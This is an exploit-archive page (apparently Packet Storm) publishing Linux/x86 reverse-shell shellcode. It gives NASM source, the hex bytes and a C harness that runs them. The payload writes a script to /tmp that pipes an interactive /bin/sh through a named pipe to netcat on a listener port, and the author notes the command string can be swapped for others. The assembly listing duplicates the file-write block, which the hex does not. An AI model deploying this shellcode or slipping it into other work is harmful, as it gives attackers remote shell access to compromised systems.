what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 Netcat Reverse Shell Shellcode

Linux/x86 Netcat Reverse Shell Shellcode
Posted Dec 6, 2016
Authored by Filippo Bersani

180 bytes small Linux/x86 Netcat with -e option disabled reverse shell shellcode.

tags | shell, x86, shellcode
systems | linux
SHA-256 | 26296736b0ffca25f81746da4feef3a90d0468e331a8f918be4135b5b0f5f212

Linux/x86 Netcat Reverse Shell Shellcode

Change Mirror Download
/*
;author: Filippo "zinzloun" Bersani
;date: 05/12/2016
;version: 1.0
;X86 Assembly/NASM Syntax
;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
; Linux bb32 4.4.0-45-generic 32bit

; description:
get a reverse shell executing a shell script saved in tmp that execute netcat that reverse the shell to the listener,
considering that by now the default nc configuration does not permitt to execute (-e) command directly anymore
this is a different approach that permitt to execute not only netcat.
LIMITATION: size of the shellcode; the attacker has to have gained the privilege to execute commmand (/bin/bash)



; see comment for details

global _start

section .text
_start:


CreateFile:
xor eax, eax ;zeroing
xor edx, edx
push eax ;NULL byte as string terminator
push 0x65782e2f ;name of file to be executed /tmp/.xe
push 0x706d742f
mov ebx, esp ;ebx point to pushed string
mov esi, esp ;save the name of the file for a later use
mov al,0x8 ;create the file...
mov cl,077o ;...with 77 permission in octal (to avoid 0)
int 0x80

jmp CallPop

WriteString:

pop ecx ;get the command string to write in the file, 3rd arg
mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg
mov dl,0x09 ;now we put value $0x09 into dl...
inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;)
mov byte [ecx+92],dl ;replace our R char with 0x0A *

xor edx,edx
mov dl,93 ;len of the buffer to write, 4th arg **
mov al,0x04 ;sys call to write the file
int 0x80
mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg
mov dl,0x09 ;now we put value $0x09 into dl...
inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;)
mov byte [ecx+92],dl ;replace our R char with 0x0A *

xor edx,edx
mov dl,93 ;len of the buffer to write, 4th arg **
mov al,0x04 ;sys call to write the file
int 0x80

CloseFile:
xor eax,eax
mov al, 0x6 ;close the stream file
int 0x80

ExecFile:
xor eax, eax
push eax ;push null into the stack
;push ////bin/bash into the stack
push 0x68736162
push 0x2f6e6962
push 0x2f2f2f2f

mov ebx,esp ;set the 1st arg /bin/bash from the stack
;set up the args array
push eax ; null
push esi ; get the saved pointer to the /tmp/.xe
push ebx ; pointer to /bin/bash
mov ecx, esp ;set the args

xor edx,edx
mov al, 0xb ;sys call 11 to execute the file
int 0x80

CallPop:
call WriteString
;this string can be configured to execute other command too, you have only to adjust the length of the buffer (**) and the index of the char (R) to replace (*)
;according to the length of the string
db "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | /bin/nc localhost 9999 > /tmp/fR"

*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x31\xd2\x50\x68\x2f\x2e\x78\x65\x68\x2f\x74\x6d\x70\x89\xe3\x89\xe6\xb0\x08\xb1\x3f\xcd\x80\xeb\x37\x59\x89"
"\xc3\xb2\x09\xfe\xc2\x88\x51\x5c\x31\xd2\xb2\x5d\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68"
"\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x56\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xe8\xc4\xff\xff\xff\x72\x6d\x20\x2d\x66"
"\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x63\x61\x74\x20\x2f\x74\x6d\x70\x2f"
"\x66\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69\x20\x32\x3e\x26\x31\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x6e\x63\x20\x20\x6c\x6f"
"\x63\x61\x6c\x68\x6f\x73\x74\x20\x39\x39\x39\x39\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x52";
main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close